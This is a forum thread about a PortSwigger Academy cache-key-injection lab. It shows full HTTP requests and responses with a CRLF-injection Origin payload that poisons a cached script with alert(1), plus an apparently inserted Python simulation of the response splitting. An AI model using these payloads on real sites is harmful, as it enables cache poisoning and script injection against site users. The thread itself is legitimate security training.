The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: Cache key injection

Cyber | Last updated: Jun 01, 2023 12:55PM UTC

Hi, I can't solve the lab. I am sending the following requests.

----- 1. -----

First request (please note that the Origin header has been added 2 times):

GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$
Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net
Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Pragma: x-get-cache-key
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

First response without duplicate Origin header:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Vary: Origin
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=35
Age: 0
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$
X-Cache: miss
Connection: close
Content-Length: 42

document.cookie = 'lang=en?utm_content=z';

First response with duplicate Origin header:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Access-Control-Allow-Origin: x
Cache-Control: max-age=35
Age: 2
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$
X-Cache: hit
Connection: close
Content-Length: 8

alert(1)

----- 2. -----

Second request:

GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/1.1
Host: 0afb003503bf820180b02bda008800cd.web-security-academy.net
Cookie: session=1uh3txObzEBQpQNLO7PYdosDJ7zaWS7I; lang=en
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Referer: https://0afb003503bf820180b02bda008800cd.web-security-academy.net/login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent%2DLength:%208%250d%250a%250d%250aalert(1)$$%23

Second response:

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 16

"Protocol error"

HTTP is downgraded to 1.1. Thanks.

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 10:04AM UTC

Hi, Is there a reason for duplicating the Origin header in the first request and duplicating the utm_content in the second? If it helps, I was able to solve the lab using the following two requests: https://snipboard.io/vEPUB3.jpg https://snipboard.io/QZwI8A.jpg Does the following video walkthrough help at all: https://www.youtube.com/watch?v=fU65sWuZPyc

Cyber | Last updated: Jun 05, 2023 09:01AM UTC

Hi Ben, I noticed that the double Origin header in the first request is not needed if the dash in the Origin header value is removed (between "Content" and "Length").

--- 1 ---

Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

returns this:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Vary: Origin
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=35
Age: 1
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$
X-Cache: hit
Connection: close
Content-Length: 42

document.cookie = 'lang=en?utm_content=z';

---------

--- 2 ---

Origin: x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$

returns this:

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Access-Control-Allow-Origin: x
Cache-Control: max-age=35
Age: 0
X-Cache-Key: /js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$
X-Cache: miss
Connection: close
Content-Length: 8

alert(1)

---------

Maybe there is a problem with the encoding. I tried the suggested video (https://www.youtube.com/watch?v=fU65sWuZPyc) but without much success.
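The response splitting that both of Cyber's posts observe (an 8-byte body of alert(1) in place of the 42-byte localize.js body), as an added worked example that is not code from this thread, from the lab, or from PortSwigger: a hypothetical back end that URL-decodes the Origin header once and reflects it into Access-Control-Allow-Origin without rejecting CR/LF, and a minimal HTTP/1.1 response parser that reads the result the way a cache or client would. The simulated server, its header order and the parser are assumptions; the two Origin values and the 42-byte body are the ones posted above. The model says nothing about cache-key construction, so it does not explain why the cache keyed the "-" and "%2d" variants differently; it only shows that both variants decode to the same injected header and both produce the truncated alert(1) body once reflected.

```python
from urllib.parse import unquote

# Constructed inputs taken from the requests/responses posted in this thread.
ORIGINAL_BODY = b"document.cookie = 'lang=en?utm_content=z';"  # 42 bytes, the un-poisoned localize.js body
ORIGIN_DASH = "x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$"    # literal dash in Content-Length
ORIGIN_PCT2D = "x%0d%0aContent%2dLength:%208%0d%0a%0d%0aalert(1)$$$$"  # dash sent as %2d


def reflect_origin(origin_header: str) -> bytes:
    """Hypothetical back end (an assumption, not the lab's code): URL-decode the
    Origin header once and echo it into Access-Control-Allow-Origin without
    rejecting CR/LF. Header order mirrors the poisoned response in the thread:
    the reflected header is written before the server's own Content-Length."""
    allowed = unquote(origin_header)
    head = "\r\n".join([
        "HTTP/1.1 200 OK",
        "Content-Type: application/javascript; charset=utf-8",
        f"Access-Control-Allow-Origin: {allowed}",
        "Cache-Control: max-age=35",
        f"Content-Length: {len(ORIGINAL_BODY)}",
        "",
        "",
    ])
    return head.encode("latin-1") + ORIGINAL_BODY


def parse_response(raw: bytes):
    """Minimal HTTP/1.1 response parser, as a cache or client would read it:
    headers end at the first blank line, the body is Content-Length bytes, and
    whatever follows is returned as leftover (it never reaches the body)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())  # first occurrence wins
    length = int(headers.get("content-length", "0"))
    return status_line, headers, rest[:length], rest[length:]


def injected_header_name(origin_header: str) -> str:
    """Name of the header that lands on the line after the injected CRLF once
    the value has been URL-decoded. '-' and '%2d' decode to the same name, so
    the back end sees identical headers for the two variants."""
    decoded = unquote(origin_header)
    second_line = decoded.split("\r\n")[1]
    return second_line.partition(":")[0]


def poisoned_body(origin_header: str) -> bytes:
    """The body a cache would store for a request carrying this Origin value."""
    _, _, body, _ = parse_response(reflect_origin(origin_header))
    return body


if __name__ == "__main__":
    cases = (("dash", ORIGIN_DASH), ("%2d", ORIGIN_PCT2D), ("benign", "https://example.com"))
    for label, origin in cases:
        status, headers, body, leftover = parse_response(reflect_origin(origin))
        print(f"{label}: Content-Length={headers['content-length']} body={body!r} "
              f"leftover={len(leftover)} bytes")
```

Run stand-alone, the two injected variants both yield Content-Length 8 and a body of alert(1), with the original 42-byte body stranded after the parsed response, while the benign origin leaves the response intact. The 400 "Protocol error" on the second request in the first post is a question about the redirect URL's encoding and is outside what this model covers.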

Ben, PortSwigger Agent | Last updated: Jun 05, 2023 05:10PM UTC

Hi, Did you take a look at the screenshots of the example requests that I used to solve the lab? The lab appears to work as expected in line with the written solution.

Cyber | Last updated: Jun 07, 2023 08:12AM UTC